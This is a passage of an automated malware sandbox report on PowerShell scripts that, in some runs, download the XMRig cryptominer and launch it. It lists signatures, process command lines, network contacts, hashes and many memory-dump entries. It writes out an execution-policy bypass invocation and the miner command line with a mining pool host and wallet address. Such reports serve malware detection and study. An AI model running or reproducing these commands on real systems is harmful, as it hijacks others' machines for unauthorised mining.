memory/4604-94-0x00007FFDF4DD0000-0x00007FFDF57BC000-memory.dmp
memory/1600-95-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-96-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-97-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-98-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-99-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-100-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-101-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-102-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-103-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-104-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-105-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-106-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-107-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-108-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-109-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-110-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-111-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-112-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-113-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-114-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-115-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-116-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-117-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-118-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-119-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-120-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-121-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-122-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-123-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-124-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-125-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-126-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-127-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-128-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-129-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-130-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-131-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-132-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-133-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-134-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-135-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-136-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-137-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-138-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-139-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-140-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-141-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-142-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-143-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-144-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-145-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-146-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-147-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-148-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-149-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-150-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-151-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-152-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-153-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-154-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
memory/1600-155-0x00007FF629BC0000-0x00007FF62A7F3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:45
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1748,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| NL | 52.142.223.178:80 | tcp |
Files
memory/224-0-0x00007FFFE5003000-0x00007FFFE5005000-memory.dmp
memory/224-10-0x000001EA2E830000-0x000001EA2E852000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40qnqvo4.kv5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/224-11-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-12-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-13-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-14-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-15-0x00007FFFE5003000-0x00007FFFE5005000-memory.dmp
memory/224-16-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
memory/224-17-0x00007FFFE5000000-0x00007FFFE5AC1000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win10v2004-20240508-en
Max time kernel
1554s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4588-0-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xj44tu10.l4x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4588-10-0x000001DB720C0000-0x000001DB720E2000-memory.dmp
memory/4588-11-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-12-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-13-0x000001DB72260000-0x000001DB7247C000-memory.dmp
memory/4588-14-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-15-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-16-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
memory/4588-18-0x00007FFF04093000-0x00007FFF04095000-memory.dmp
memory/4588-20-0x00007FFF04090000-0x00007FFF04B51000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:18
Platform
win10-20240404-en
Max time kernel
1793s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1468 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1468 wrote to memory of 4016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/1468-3-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/1468-5-0x0000020A48A40000-0x0000020A48A62000-memory.dmp
memory/1468-6-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-9-0x0000020A48D10000-0x0000020A48D86000-memory.dmp
memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhgguzv4.5ar.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-48-0x0000020A48AE0000-0x0000020A48AF2000-memory.dmp
memory/1468-61-0x0000020A48AD0000-0x0000020A48ADA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4016-90-0x000002825D4B0000-0x000002825D4D0000-memory.dmp
memory/4016-91-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/1468-92-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-94-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/4016-93-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/1468-95-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-96-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4016-97-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-98-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-99-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-100-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-101-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-102-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-103-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-104-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-105-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-106-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-107-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-108-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-109-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-110-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-111-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-112-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-113-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-114-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-115-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-116-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-117-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-118-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-119-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-120-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-121-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-122-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-123-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-124-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-125-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-126-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-127-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-128-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-129-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-130-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-131-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-132-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-133-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-134-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-135-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-136-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-137-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-138-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-139-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-140-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-141-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-142-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-143-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-144-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-145-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-146-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-147-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-148-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-149-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-150-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-151-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-152-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-153-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-154-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-155-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-156-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
memory/4016-157-0x00007FF69C610000-0x00007FF69D243000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:23
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 404 wrote to memory of 2528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 404 wrote to memory of 2528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/404-3-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp
memory/404-5-0x00000225A3C60000-0x00000225A3C82000-memory.dmp
memory/404-6-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-10-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-9-0x00000225A3E10000-0x00000225A3E86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mi4ygcu2.fzs.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
